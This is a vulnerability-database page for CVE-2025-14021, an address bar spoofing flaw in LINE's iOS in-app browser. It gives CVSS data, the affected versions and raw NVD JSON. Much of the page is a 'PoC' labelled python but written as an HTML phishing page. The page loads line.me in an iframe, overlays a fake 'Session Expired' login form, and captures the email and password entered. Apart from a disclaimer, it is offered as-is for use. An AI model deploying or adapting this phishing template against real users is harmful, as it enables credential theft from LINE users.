Security Vulnerability Report
中文
CVE-2025-14021 CVSS 4.3 MEDIUM

CVE-2025-14021

Published: 2025-12-15 07:15:51
Last Modified: 2025-12-18 02:01:43
Source: [email protected]

Description

The in-app browser in LINE client for iOS versions prior to 14.14 is vulnerable to address bar spoofing, which could allow attackers to execute malicious JavaScript within iframes while displaying trusted URLs, enabling phishing attacks through overlaid malicious content.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:linecorp:line:*:*:*:*:*:iphone_os:*:* - VULNERABLE
LINE client for iOS < 14.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-14021 PoC: Address Bar Spoofing in LINE iOS In-App Browser --> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>LINE iOS Address Bar Spoofing PoC</title> <style> body { margin: 0; padding: 0; font-family: Arial, sans-serif; } .spoofed-content { position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); display: flex; justify-content: center; align-items: center; z-index: 1000; } .login-form { background: white; padding: 40px; border-radius: 10px; box-shadow: 0 10px 40px rgba(0,0,0,0.3); text-align: center; } .login-form h2 { color: #333; margin-bottom: 20px; } .login-form input { width: 250px; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 5px; font-size: 14px; } .login-form button { width: 100%; padding: 12px; background: #00B900; color: white; border: none; border-radius: 5px; font-size: 16px; cursor: pointer; margin-top: 10px; } .login-form button:hover { background: #009900; } .real-page { position: relative; height: 100vh; background: #f5f5f5; padding: 20px; } .hidden { display: none; } </style> </head> <body> <!-- Legitimate looking iframe to spoof address bar --> <iframe id="spoofFrame" src="https://www.line.me/" style="width:100%; height:100%; border:none;"></iframe> <!-- Overlay malicious content --> <div id="maliciousOverlay" class="spoofed-content"> <div class="login-form"> <h2>⚠️ Session Expired</h2> <p style="color:#666; margin-bottom:15px;">Please verify your identity</p> <form id="phishingForm"> <input type="text" id="email" placeholder="Email or Phone" required> <input type="password" id="password" placeholder="Password" required> <button type="submit">Sign In</button> </form> <p style="font-size:12px; color:#999; margin-top:15px;">Secured by LINE</p> </div> </div> <script> // Wait for iframe to load, then overlay phishing content document.getElementById('spoofFrame').onload = function() { setTimeout(() => { // Inject malicious content that appears to be part of LINE const overlay = document.getElementById('maliciousOverlay'); overlay.style.display = 'flex'; // Attempt to hide real URL in address bar context // In LINE's in-app browser, this content overlays the iframe // while the address bar still shows the iframe's URL }, 1500); }; // Capture credentials document.getElementById('phishingForm').onsubmit = function(e) { e.preventDefault(); const credentials = { email: document.getElementById('email').value, password: document.getElementById('password').value, timestamp: new Date().toISOString(), userAgent: navigator.userAgent }; console.log('Stolen credentials:', credentials); alert('Verification failed. Please try again.'); }; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14021", "sourceIdentifier": "[email protected]", "published": "2025-12-15T07:15:50.850", "lastModified": "2025-12-18T02:01:42.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The in-app browser in LINE client for iOS versions prior to 14.14 is vulnerable to address bar spoofing, which could allow attackers to execute malicious JavaScript within iframes while displaying trusted URLs, enabling phishing attacks through overlaid malicious content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linecorp:line:*:*:*:*:*:iphone_os:*:*", "versionEndExcluding": "14.14.0", "matchCriteriaId": "D9FA9E6A-00E2-46D7-AEBC-9081573DFA81"}]}]}], "references": [{"url": "https://hackerone.com/reports/2548498", "source": "[email protected]", "tags": ["Permissions Required", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.